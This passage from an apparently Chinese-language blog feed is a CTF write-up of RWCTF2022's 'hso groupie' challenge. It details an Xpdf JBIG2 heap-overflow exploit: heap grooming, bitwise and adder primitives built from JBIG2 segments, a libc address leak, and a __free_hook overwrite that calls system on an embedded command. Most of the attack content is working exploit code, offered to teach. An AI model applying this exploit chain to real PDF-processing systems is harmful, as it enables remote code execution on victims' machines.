pointers, when readTextRegion processes that first referenced Symbol Dict it writes exactly <code>size_to_overflow</code> bytes into the syms chunk, overflowing all the way into the header of the pageBitmap JBIG2Bitmap struct. That achieves the overflow.</p><p>Here is how size_to_overflow is derived, starting with the heap layout:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// low address --------------------------------------------</span></span><br><span class="line"><span class="comment">/* </span></span><br><span class="line"><span class="comment">    Other heap allocations, including </span></span><br><span class="line"><span class="comment">    1. the size=8 global GList backing store</span></span><br><span class="line"><span class="comment">    2. DummyAlloc</span></span><br><span class="line"><span class="comment">    3. SymbolDict 0, 1, 2</span></span><br><span class="line"><span class="comment">    4. 
...</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line">SymbolDict3<span class="number">-8</span>;</span><br><span class="line">pageBitmap backing buffer <span class="comment">// heap hole left by the size=16 global GList backing store</span></span><br><span class="line">SymbolDict9<span class="number">-16</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">// writing starts here</span></span><br><span class="line">syms <span class="comment">// the size of syms is syms_size</span></span><br><span class="line">SymbolDict17<span class="number">-32</span>; <span class="comment">// space for 16 SymbolDicts; one SymbolDict takes 0x40 bytes</span></span><br><span class="line">size=<span class="number">64</span> global GList backing store; <span class="comment">// the GList data size here is GLIST_DATA_SIZE</span></span><br><span class="line">pageBitmap JBIG2Bitmap struct  <span class="comment">// vtbl + segNum + w + h + line must also be overwritten here, 24 bytes in total</span></span><br><span class="line">    </span><br><span class="line"><span class="comment">// high address -------------------------------------------</span></span><br></pre></td></tr></table></figure><p>From this layout we get:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">size_to_overflow = (</span><br><span class="line">    ptmalloc_chunk_size(syms_size)</span><br><span class="line">    <span class="comment"># 40: sizeof(JBIG2SymbolDict); there are (glist_capacity // 2) irrelevant JBIG2SymbolDict-s</span></span><br><span class="line">    + ptmalloc_chunk_size(<span class="number">40</span>) * 
(glist_capacity // <span class="number">2</span>)</span><br><span class="line">    + ptmalloc_chunk_size(GLIST_DATA_SIZE)</span><br><span class="line">    <span class="comment"># Current page JBIG2Bitmap</span></span><br><span class="line">    <span class="comment"># vtbl(8)</span></span><br><span class="line">    + <span class="number">8</span></span><br><span class="line">    <span class="comment"># segNum(4), w(4), h(4), line(4)</span></span><br><span class="line">    + <span class="number">4</span> * <span class="number">4</span></span><br><span class="line">)</span><br></pre></td></tr></table></figure><p>Next, the syms_size-sized chunk that readTextRegionSeg has just freed is allocated again and held, to avoid possible crashes later in the exploit.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Take back the free-d syms, hold it to prevent potential crash.</span></span><br><span class="line">GenericRegion(<span class="number">103</span>, imm=<span class="literal">False</span>, bitmap=Bitmap(<span class="number">8</span>, syms_size)),</span><br></pre></td></tr></table></figure><p>Because what gets written out of bounds over the header of the pageBitmap JBIG2Bitmap struct are <strong>pointer values</strong>, the range we can read and write out of bounds is limited. We therefore use this limited pageBitmap out-of-bounds read/write primitive to modify the bitmap's own JBIG2Bitmap header, enlarging w, h and line to extend its reach. From the heap layout above we can likewise derive the distance from <code>page_bitmap_buf</code> to <code>pageBitmap JBIG2Bitmap</code>:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">page_bitmap_buf_to_class_offset = (</span><br><span class="line">    <span class="built_in">ptmalloc_chunk_size</span>(GLIST_DATA_SIZE // <span class="number">4</span>)</span><br><span class="line">    + <span 
class="built_in">ptmalloc_chunk_size</span>(<span class="number">40</span>) * (glist_capacity // <span class="number">4</span>)</span><br><span class="line">    + size_to_overflow</span><br><span class="line">    - <span class="number">4</span> * <span class="number">4</span></span><br><span class="line">    - <span class="number">8</span></span><br><span class="line">)</span><br></pre></td></tr></table></figure><p>Then w, h and line are changed to $w=2^{27}$, $h=2^{24}$ and $\mathrm{line}=2^{24}$ respectively:</p><blockquote><p>imm set to true means immediate rendering, i.e. the specified location on pageBitmap is modified right away.</p></blockquote><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Overwrite pageBitmap-&gt;w, h and line</span></span><br><span class="line">GenericRegion(</span><br><span class="line">    <span class="number">104</span>,</span><br><span class="line">    x=(page_bitmap_buf_to_class_offset + <span class="number">12</span>) * <span class="number">8</span>,</span><br><span class="line">    y=<span class="number">0</span>,</span><br><span class="line">    comb_op=CombOp.Replace,</span><br><span class="line">    <span class="comment"># (x, y) -&gt; mem[(y &lt;&lt; 24) | (x &gt;&gt; 3)] &gt;&gt; (7 - (x &amp; 7)), max 48-bit addressing</span></span><br><span class="line">    bitmap=Bitmap(struct.pack(<span class="string">&quot;&lt;III&quot;</span>, <span class="number">2</span> ** <span class="number">27</span>, <span class="number">2</span> ** <span class="number">24</span>, <span class="number">2</span> ** <span class="number">24</span>)),</span><br><span class="line">    imm=<span class="literal">True</span>,</span><br><span 
class="line">),</span><br></pre></td></tr></table></figure><p>修改后的 pageBitmap 的二维空间构造：</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">+------------------&gt; w=2^27 bit</span><br><span class="line">|</span><br><span class="line">|</span><br><span class="line">|</span><br><span class="line">|</span><br><span class="line">|</span><br><span class="line">|</span><br><span class="line">V h=2^24 bit</span><br></pre></td></tr></table></figure><p>最后创建带有 16 个 Bitmap 的 SymbolDict ，以备接下来的利用所使用：</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 16 &quot;variables&quot;. Since we can only do bitwise operations relative to page bitmap</span></span><br><span class="line"><span class="comment"># with Refinement regions, we need these variables for peeking other absolute</span></span><br><span class="line"><span class="comment"># addresses, and also rebase the page bitmap in one segment command.</span></span><br><span class="line">SymbolDict(<span class="number">105</span>, [Bitmap(<span class="number">64</span>, <span class="number">1</span>)] * <span class="number">16</span>)</span><br></pre></td></tr></table></figure><p>这些 SymbolDict 将用于<strong>地址解引用原语</strong>中，具体在下面会详细介绍。</p><blockquote><p>整体的堆风水布局大体如上所示。完成堆溢出后，pageBitmap 具备了大偏移读写的功能，因此接下来就要开始写原语利用了。</p></blockquote><h3 id="2-位运算原语">2. 
Bitwise operation primitives</h3><p>Recall the <code>GenericRefinementRegionSeg</code> introduced earlier (scroll back up if you do not). We now use the behavior of this segment to build a bitwise operator that works on arbitrary bits.</p><p>The bitwise operator implemented in the exploit is shown below:</p><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">BitSeg</span>:</span><br><span class="line">    _seq = itertools.count(<span class="number">10000</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">__init__</span>(<span class="params">self, seg_num</span>):</span><br><span class="line">        <span class="variable language_">self</span>.seg_num = seg_num</span><br><span class="line">        <span class="variable language_">self</span>.__consumed = <span class="literal">False</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">def</span> <span class="title 
function_">consume</span>(<span class="params">self</span>):</span><br><span class="line">        <span class="keyword">assert</span> <span class="keyword">not</span> <span class="variable language_">self</span>.__consumed</span><br><span class="line">        <span class="variable language_">self</span>.__consumed = <span class="literal">True</span></span><br><span class="line">        <span class="keyword">return</span> <span class="variable language_">self</span>.seg_num</span><br><span class="line"></span><br><span class="line"><span class="meta">    @classmethod</span></span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">from_page</span>(<span class="params">cls, offset</span>):</span><br><span class="line">        x, y = offset % <span class="number">2</span> ** <span class="number">27</span>, offset // <span class="number">2</span> ** <span class="number">27</span></span><br><span class="line">        idx = <span class="built_in">next</span>(cls._seq)</span><br><span class="line">        page0.append(ReadoutRefinement(idx, x=x, y=y, imm=<span class="literal">False</span>))</span><br><span class="line">        <span class="keyword">return</span> cls(idx)</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">CombOp</span>(enum.IntEnum):</span><br><span class="line">    Or = <span class="number">0</span></span><br><span class="line">    And = <span class="number">1</span></span><br><span class="line">    Xor = <span class="number">2</span></span><br><span class="line">    Xnor = <span class="number">3</span></span><br><span class="line">    Replace = <span class="number">4</span></span><br><span class="line">    </span><br><span class="line"><span class="keyword">def</span> <span class="title function_">bitop</span>(<span class="params">oa, ob, op: CombOp</span>):</span><br><span class="line">    b = BitSeg.from_page(ob)</span><br><span class="line">    
x, y = oa % <span class="number">2</span> ** <span class="number">27</span>, oa // <span class="number">2</span> ** <span class="number">27</span></span><br><span class="line">    page0.append(</span><br><span class="line">        ReadoutRefinement(<span class="number">65536</span>, x=x, y=y, imm=<span class="literal">True</span>, ref=b.consume(), comb_op=op)</span><br><span class="line">    )</span><br></pre></td></tr></table></figure><blockquote><p>The <code>oa</code> and <code>ob</code> parameters of the <code>bitop</code> primitive are <strong>in bits</strong>, and <code>op</code> takes one of 5 values.</p></blockquote><p>The bitop primitive first <strong>maps</strong> the one-dimensional offsets oa and ob to the two-dimensional bitmap offsets xy1 and xy2. When the RefinementRegionSeg for ob is parsed, the data at xy2 is read out of pageBitmap and stored in segments.</p><blockquote><p>Why is 2^27 the divisor and modulus when mapping a one-dimensional offset to a two-dimensional one? Because that is the width we set above.</p></blockquote><p>Then, when hso parses the RefinementRegionSeg for oa, it reads back the RefinementRegion stored for ob and combines it with the bit at xy1 in pageBitmap. This gives us <strong>a bitwise operation between any two bits of pageBitmap</strong>.</p><p>Note that findSegment works by <strong>walking the segments list in order and comparing segNum</strong>. So every RefinementRegion added to segments must have a <strong>segNum different from every segment appended before it!</strong></p><p>With the <code>bitop</code> primitive available, we can build further primitives on top of it:</p><figure class="highlight python"><table><tr><td class="code"><pre><span class="line">bitwise_mov = <span class="keyword">lambda</span> a, b: bitop(a, b, CombOp.Replace)</span><br><span class="line">bitwise_xor = <span 
class="keyword">lambda</span> a, b: bitop(a, b, CombOp.Xor)</span><br><span class="line">bitwise_and = <span class="keyword">lambda</span> a, b: bitop(a, b, CombOp.And)</span><br><span class="line">bitwise_or = <span class="keyword">lambda</span> a, b: bitop(a, b, CombOp.Or)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">op_q_q</span>(<span class="params">oa, ob, op: CombOp</span>):</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">64</span>):</span><br><span class="line">        bitop(oa * <span class="number">8</span> + i, ob * <span class="number">8</span> + i, op)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment"># Offsets are in bytes.</span></span><br><span class="line">mov_q_q = <span class="keyword">lambda</span> a, b: op_q_q(a, b, CombOp.Replace)</span><br><span class="line">xor_q_q = <span class="keyword">lambda</span> a, b: op_q_q(a, b, CombOp.Xor)</span><br><span class="line">and_q_q = <span class="keyword">lambda</span> a, b: op_q_q(a, b, CombOp.And)</span><br><span class="line">or_q_q = <span class="keyword">lambda</span> a, b: op_q_q(a, b, CombOp.Or)</span><br></pre></td></tr></table></figure><p>The oa and ob parameters of the <code>op_q_q</code> primitive are <strong>in bytes</strong> (note that this differs from bitop, whose offsets are in bits).</p><p>The <code>op_q_q</code> primitive performs one <strong>8-byte bitwise operation</strong> between the two locations at the one-dimensional byte offsets <code>oa</code> and <code>ob</code>.</p><p>For example, the primitive <code>and_q_q(0, 8)</code> does the following:</p><ul><li>It takes the eight bytes at <strong>byte offset 0</strong> (bytes 0-7) and the eight bytes at <strong>byte offset 8</strong> (bytes 8-15) and ANDs them bit by bit.</li><li>It stores the result in the eight bytes at <strong>byte offset 0</strong> (bytes 0-7).</li></ul><blockquote><p>This primitive is easy to understand; it is just awkward to put into words, or perhaps my writing is not up to it.</p></blockquote><p>Next we build an 8-byte adder out of bitwise operations. It may help to read <a 
href="https://developer.aliyun.com/article/593228">this article</a> first and then the code:</p><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment"># Don&#x27;t worry, Libra won&#x27;t hu^W^W^W Xpdf allocates 1 more byte</span></span><br><span class="line">adder_buf_offset = GLIST_DATA_SIZE // <span class="number">4</span> * <span class="number">8</span> <span class="comment"># 1024</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">add_q_q</span>(<span class="params">oa, ob</span>):</span><br><span class="line">    oa, ob = oa * <span class="number">8</span>, ob * <span class="number">8</span></span><br><span class="line">    ab_xor, ab_and, carry, ab_xor_c_and, zero = <span class="built_in">range</span>(</span><br><span class="line">        adder_buf_offset, adder_buf_offset + <span class="number">5</span></span><br><span class="line">    )</span><br><span class="line">    <span 
class="comment"># Initially the carry-in of the lowest-bit full adder is 0</span></span><br><span class="line">    bitwise_mov(carry, zero)</span><br><span class="line">    <span class="comment"># 8 bytes = 64 bits, hence range(64)</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">64</span>):</span><br><span class="line">        <span class="comment"># A full adder for each **bit**; one full adder is made of two half adders</span></span><br><span class="line">        a_bit_offset = oa + i // <span class="number">8</span> * <span class="number">8</span> + (<span class="number">7</span> - i % <span class="number">8</span>)</span><br><span class="line">        b_bit_offset = ob + i // <span class="number">8</span> * <span class="number">8</span> + (<span class="number">7</span> - i % <span class="number">8</span>)</span><br><span class="line">        <span class="comment"># This is a naive full-adder. Applying TIS-100 skill could cut 3~4 ops maybe.</span></span><br><span class="line">        <span class="comment"># First half adder</span></span><br><span class="line">        bitwise_mov(ab_xor, a_bit_offset)</span><br><span class="line">        bitwise_xor(ab_xor, b_bit_offset)</span><br><span class="line">        bitwise_mov(ab_and, a_bit_offset)</span><br><span class="line">        bitwise_and(ab_and, b_bit_offset)</span><br><span class="line">        <span class="comment"># Second half adder</span></span><br><span class="line">        bitwise_mov(a_bit_offset, ab_xor)</span><br><span class="line">        bitwise_xor(a_bit_offset, carry)  <span class="comment"># output (S)</span></span><br><span class="line">        bitwise_mov(ab_xor_c_and, ab_xor)</span><br><span class="line">        bitwise_and(ab_xor_c_and, carry)</span><br><span class="line">        <span class="comment"># Update the carry</span></span><br><span class="line">        bitwise_mov(carry, ab_and)</span><br><span class="line">        bitwise_or(carry, 
ab_xor_c_and)</span><br></pre></td></tr></table></figure><p>The structure of the full adder is shown below:</p><p><img src="/2022/02/rwctf2022_hso/39673408-3e4f3e44-516e-11e8-8c7b-1d78b3f7f28b.png" alt="1582983175-59c4f8cba758f_articlex"></p><h3 id="3-立即数运算原语">3. Immediate-operand primitives</h3><p>Besides the bitwise primitives above, there are primitives that load an external immediate value and operate on it.</p><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">op_q_imm</span>(<span class="params">offset, imm, op</span>):</span><br><span class="line">    offset *= <span class="number">8</span></span><br><span class="line">    x, y = offset % <span class="number">2</span> ** <span class="number">27</span>, offset // <span class="number">2</span> ** <span class="number">27</span></span><br><span class="line">    page0.append(</span><br><span class="line">        GenericRegion(</span><br><span class="line">            <span class="number">233</span>, x=x, y=y, comb_op=op, bitmap=Bitmap(struct.pack(<span class="string">&quot;&lt;Q&quot;</span>, imm)), imm=<span class="literal">True</span></span><br><span class="line">        )</span><br><span class="line">    )</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">mov_q_imm = <span class="keyword">lambda</span> o, imm: op_q_imm(o, imm, CombOp.Replace)</span><br><span class="line">xor_q_imm = <span class="keyword">lambda</span> o, imm: op_q_imm(o, imm, CombOp.Xor)</span><br><span class="line">and_q_imm = <span class="keyword">lambda</span> o, imm: op_q_imm(o, 
imm, CombOp.And)</span><br><span class="line">or_q_imm = <span class="keyword">lambda</span> o, imm: op_q_imm(o, imm, CombOp.Or)</span><br></pre></td></tr></table></figure><p>The readGenericRegionSeg method reads a bitmap from the external JBIG2Stream and combines it with a given location on pageBitmap, so a GenericRegionSeg can serve as the immediate-operand primitive here.</p><h3 id="4-地址解引用原语">4. Address dereference primitives</h3><p>Once we have the absolute address at which some pointer is stored, how do we read the pointer out of that address? This requires a dereference operation, for which the exploit provides two primitives:</p><ul><li><p><code>rebase_variable_q</code>: copies the 8 bytes at one-dimensional offset <code>addr_page_offset</code> in pageBitmap into the <strong>data field</strong> of the idx-th JBIG2Bitmap in the 16-Bitmap SymbolDict <strong>created in the last step of the heap feng shui</strong>:</p><blockquote><p>Note that the value overwrites the data field of the JBIG2Bitmap itself; it is <strong>not</strong> written to the memory that the data pointer points to.</p></blockquote><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">rebase_variable_q</span>(<span class="params">idx, addr_page_offset</span>):</span><br><span class="line">    mov_q_q(</span><br><span class="line">        variable_bitmap_offset + idx * ptmalloc_chunk_size(<span class="number">0x20</span>) + <span class="number">0x18</span>,</span><br><span class="line">        addr_page_offset,</span><br><span class="line">    )</span><br></pre></td></tr></table></figure></li><li><p><code>load_variable</code>: reads the first 8 bytes <strong>of the backing store</strong> (the memory that the data pointer points to) of the idx-th JBIG2Bitmap in that last SymbolDict, and writes them to the 8 bytes at one-dimensional offset <code>to_page_offset</code> in pageBitmap.</p><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">load_variable</span>(<span class="params">to_page_offset, idx</span>):</span><br><span 
class="line">    to_page_offset *= <span class="number">8</span></span><br><span class="line">    x, y = to_page_offset % <span class="number">2</span> ** <span class="number">27</span>, to_page_offset // <span class="number">2</span> ** <span class="number">27</span></span><br><span class="line">    page0.append(</span><br><span class="line">        TextRegion(</span><br><span class="line">            <span class="number">233</span>,</span><br><span class="line">            x=x,</span><br><span class="line">            y=y,</span><br><span class="line">            w=<span class="number">64</span>,</span><br><span class="line">            h=<span class="number">1</span>,</span><br><span class="line">            imm=<span class="literal">True</span>,</span><br><span class="line">            instances=[idx],</span><br><span class="line">            ref_symbol_cnt=<span class="number">16</span>,</span><br><span class="line">            ref_segs=[<span class="number">105</span>],</span><br><span class="line">        )</span><br><span class="line">    )</span><br></pre></td></tr></table></figure></li></ul><p>Combining the two primitives gives us address dereference.</p><h3 id="5-整体利用流程">5. 
Overall exploitation flow</h3><p>With all the primitives in place, we now combine them to overwrite free_hook with the address of libc_system.</p><p>First we need to leak an address (which of course cannot be a heap address). Looking at the heap layout:</p><figure class="highlight cpp"><table><tr><td class="code"><pre><span class="line"><span class="comment">// low address .....</span></span><br><span class="line">...</span><br><span class="line">SymbolDict3<span class="number">-8</span>;</span><br><span class="line">pageBitmap backing buffer <span class="comment">// the heap hole left by the size=16 global GList backing store</span></span><br><span class="line">SymbolDict9<span class="number">-16</span>;</span><br><span class="line">...</span><br><span class="line"><span class="comment">// high address .....</span></span><br></pre></td></tr></table></figure><p>We can see that a SymbolDict sits right next to the pageBitmap buffer, so we can read its <strong>vtable pointer</strong>.</p><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment"># vtbl of a JBIG2SymbolDict adjacent to page bitmap buffer</span></span><br><span class="line"><span class="comment"># Copy the vtbl address to +0</span></span><br><span class="line">mov_q_q(<span class="number">0</span>, ptmalloc_chunk_size(GLIST_DATA_SIZE // <span class="number">4</span>))</span><br></pre></td></tr></table></figure><p>Then we load a relative offset from outside into pageBitmap data + 8:</p><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment"># Compute -vtbl_offset + free_got_offset</span></span><br><span 
class="line">mov_q_imm(</span><br><span class="line">    <span class="number">8</span>, (-PDFTOHTML_VTBL_JBIG2SYMBOLDICT_OFFSET + PDFTOHTML_FREE_GOT_OFFSET) % <span class="number">2</span> ** <span class="number">64</span></span><br><span class="line">)</span><br></pre></td></tr></table></figure><p>A simple addition then yields the absolute address of the free entry in the GOT, stored at +0:</p><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment"># vtbl address + (-vtbl_offset + free_got_offset) gives the address of free_got, stored at +0</span></span><br><span class="line">add_q_q(<span class="number">0</span>, <span class="number">8</span>)</span><br></pre></td></tr></table></figure><p>Next, we dereference this <code>free.got</code> address to obtain the address of <code>libc.free</code>:</p><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment"># Take the free_got address from +0 and put it in the data pointer of &quot;variable&quot; 0</span></span><br><span class="line">rebase_variable_q(<span class="number">0</span>, <span class="number">0</span>)</span><br><span class="line"><span class="comment"># Read the value held by &quot;variable&quot; 0 (now the absolute address of libc.free) and store it at +8</span></span><br><span class="line">load_variable(<span class="number">8</span>, <span class="number">0</span>)  <span class="comment"># address of libc.free at +8</span></span><br></pre></td></tr></table></figure><p>With the address of <code>libc.free</code> in hand, we load relative offsets and add them. After a few simple steps we have the absolute addresses of <code>free_hook</code> and <code>libc_system</code>:</p><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment"># Put the immediate -LIBC_FREE_OFFSET (mod 2^64) at +0</span></span><br><span 
class="line">mov_q_imm(<span class="number">0</span>, -LIBC_FREE_OFFSET % <span class="number">2</span> ** <span class="number">64</span>)</span><br><span class="line"><span class="comment"># libc.free address + (-LIBC_FREE_OFFSET) gives the libc base address, stored at +8</span></span><br><span class="line">add_q_q(<span class="number">8</span>, <span class="number">0</span>)</span><br><span class="line"><span class="comment"># Copy the libc base address from +8 to +0</span></span><br><span class="line">mov_q_q(<span class="number">0</span>, <span class="number">8</span>)</span><br><span class="line"><span class="comment"># Put the immediate LIBC_FREE_HOOK_OFFSET at +16</span></span><br><span class="line">mov_q_imm(<span class="number">16</span>, LIBC_FREE_HOOK_OFFSET)</span><br><span class="line"><span class="comment"># libc base + LIBC_FREE_HOOK_OFFSET is the absolute address of free_hook, stored at +0</span></span><br><span class="line">add_q_q(<span class="number">0</span>, <span class="number">16</span>)</span><br><span class="line"><span class="comment"># Put the immediate LIBC_SYSTEM_OFFSET (the offset of system) at +16</span></span><br><span class="line">mov_q_imm(<span class="number">16</span>, LIBC_SYSTEM_OFFSET)</span><br><span class="line"><span class="comment"># libc base + LIBC_SYSTEM_OFFSET is the absolute address of system, stored at +8</span></span><br><span class="line">add_q_q(<span class="number">8</span>, <span class="number">16</span>)</span><br></pre></td></tr></table></figure><p>Note that the buffer at <code>pageBitmap-&gt;data</code> now holds:</p><figure class="highlight text"><table><tr><td class="code"><pre><span class="line">+0: free_hook_address     +8: 
libc_system_address</span><br></pre></td></tr></table></figure><p>Next we compute the address <code>pageBitmap-&gt;data + 8</code>, that is, the memory address where this <code>libc_system_address</code> value is stored:</p><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment"># Copy the data pointer of pageBitmap to +24</span></span><br><span class="line">mov_q_q(<span class="number">24</span>, page_bitmap_buf_to_data_ptr)</span><br><span class="line"><span class="comment"># Put the immediate 8 at +16</span></span><br><span class="line">mov_q_imm(<span class="number">16</span>, <span class="number">8</span>)</span><br><span class="line"><span class="comment"># Add 8 to the data pointer and store the result at +24</span></span><br><span class="line">add_q_q(<span class="number">24</span>, <span class="number">16</span>)</span><br></pre></td></tr></table></figure><p>What is this address for? Read on, the main act is about to begin:</p><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment"># Copy the value of the pageBitmap data pointer into the data field of variable 0</span></span><br><span class="line">rebase_variable_q(<span class="number">0</span>, page_bitmap_buf_to_data_ptr)</span><br><span class="line"><span class="comment"># Copy the value data pointer + 8 into the data field of variable 1</span></span><br><span class="line">rebase_variable_q(<span class="number">1</span>, <span class="number">24</span>)</span><br><span class="line"><span class="comment"># Read the value of variable 0 and write it over the data pointer; this changes the data pointer to free_hook_address</span></span><br><span 
class="line">load_variable(page_bitmap_buf_to_data_ptr, <span class="number">0</span>)</span><br><span class="line"><span class="comment"># Read the value of variable 1 (that is, libc_system_address) and write it to +0, which is now the pointer stored at free_hook</span></span><br><span class="line"><span class="comment"># This completes the overwrite of the free hook</span></span><br><span class="line">load_variable(<span class="number">0</span>, <span class="number">1</span>)</span><br></pre></td></tr></table></figure><p>At this point <strong>the free hook has been overwritten with the address of libc_system</strong>, and the next step is to execute a command.</p><p>We append one more bitmap that carries the command to run:</p><figure class="highlight python"><table><tr><td class="code"><pre><span class="line">page0.append(</span><br><span class="line">    GenericRegion(<span class="number">233</span>, x=<span class="number">64</span>, y=<span class="number">0</span>, comb_op=CombOp.And, bitmap=Bitmap(COMMAND_TO_RUN))</span><br><span class="line">)</span><br></pre></td></tr></table></figure><p>When <code>readGenericRegionSeg</code> is done with it, the newly created bitmap (the one carrying the command) is freed, which triggers <code>system(command)</code>:</p><figure class="highlight cpp"><table><tr><td 
class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">JBIG2Stream::readGenericRegionSeg</span><span class="params">(Guint segNum, GBool imm,</span></span></span><br><span class="line"><span class="params"><span class="function">                                       GBool lossless, Guint length)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    [...];</span><br><span class="line">    <span class="comment">// read the bitmap</span></span><br><span class="line">    bitmap = <span class="built_in">readGenericBitmap</span>(mmr, w, h, templ, tpgdOn, gFalse,</span><br><span class="line">                               <span class="literal">NULL</span>, atx, aty, mmr ? length - <span class="number">18</span> : <span class="number">0</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// combine the region bitmap into the page bitmap</span></span><br><span class="line">    <span class="keyword">if</span> (imm)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">if</span> (pageH == <span class="number">0xffffffff</span> &amp;&amp; y + h &gt; curPageH)</span><br><span class="line">        &#123;</span><br><span class="line">            pageBitmap-&gt;<span class="built_in">expand</span>(y + h, pageDefPixel);</span><br><span class="line">        &#125;</span><br><span class="line">        pageBitmap-&gt;<span class="built_in">combine</span>(bitmap, x, y, extCombOp);</span><br><span class="line">        <span class="comment">// system is triggered here</span></span><br><span class="line">        <span class="keyword">delete</span> bitmap;</span><br><span class="line"></span><br><span class="line">        <span class="comment">// store the region bitmap</span></span><br><span class="line">    &#125;</span><br><span class="line">    [...]</span><br><span 
class="line">&#125;</span><br></pre></td></tr></table></figure><p>但有两点需要注意：</p><ol><li><p>imm 必须为 true，这样才能触发 delete 操作。</p></li><li><p>创建的 GenericRegionSeg，其<strong>二维偏移 xy 映射至一维偏移后的偏移量，不能小于 64（即 8 字节）</strong></p><p>这是因为代码中会先执行 <code>pageBitmap-&gt;combine</code> 再执行 <code>delete bitmap</code> 操作。此时的 <code>pageBitmap-&gt;data</code> 为 free hook address，如果执行 combine 时修改了<code>pageBitmap-&gt;data</code> 最低的8个字节，那么 free 时就无法调用到 libc_system，因为保存在 free_hook 上面的 libc_system 地址被破坏了。</p></li></ol><h2 id="六、参考">六、参考</h2><ul><li><p><a href="https://github.com/Riatre/hso-groupie">hso-groupie - Riatre github</a></p></li><li><p><a href="https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html">A deep dive into an NSO zero-click iMessage exploit: Remote Code Execution - Google Project Zero</a></p></li><li><p><a href="https://blog.csdn.net/tjcwt2011/article/details/107877566">一个简单PDF文件的结构分析 - CSDN</a></p></li><li><p><a href="https://blog.csdn.net/lacoucou/article/details/114638913">PDF 文件格式 基本结构 - CSDN</a></p></li><li><p><a href="https://www.adobe.com/content/dam/acom/en/devnet/pdf/pdfs/PDF32000_2008.pdf">https://www.adobe.com/content/dam/acom/en/devnet/pdf/pdfs/PDF32000_2008.pdf - Adobe</a></p><blockquote><p>重点在 <code>7.4.7 JBIG2Decode Filter</code> 这节。</p></blockquote></li><li><p><a href="https://github.com/agl/jbig2enc/blob/master/fcd14492.pdf">Coding of Still Pictures : JBIG &amp; JPEG - JBIG Committee</a></p></li></ul>]]></content>
    
    
      
      
    <summary type="html">&lt;h2 id=&quot;简介&quot;&gt;Introduction&lt;/h2&gt;
&lt;p&gt;These are notes written while reviewing the &lt;code&gt;hso groupie&lt;/code&gt; challenge from RWCTF2022. The challenge is based on Project Zero's &lt;strong&gt;A deep dive into an NSO zero-click</summary>
      
    
    
    
    
    <category term="CTF" scheme="https://kiprey.github.io/tags/CTF/"/>
    
    <category term="Pwn" scheme="https://kiprey.github.io/tags/Pwn/"/>
    
  </entry>
  
  <entry>
    <title>RWCTF2022 Pwn Notes 2 - FLAG Writeup</title>
    <link href="https://kiprey.github.io/2022/01/rwctf2022_flag/"/>
    <id>https://kiprey.github.io/2022/01/rwctf2022_flag/</id>
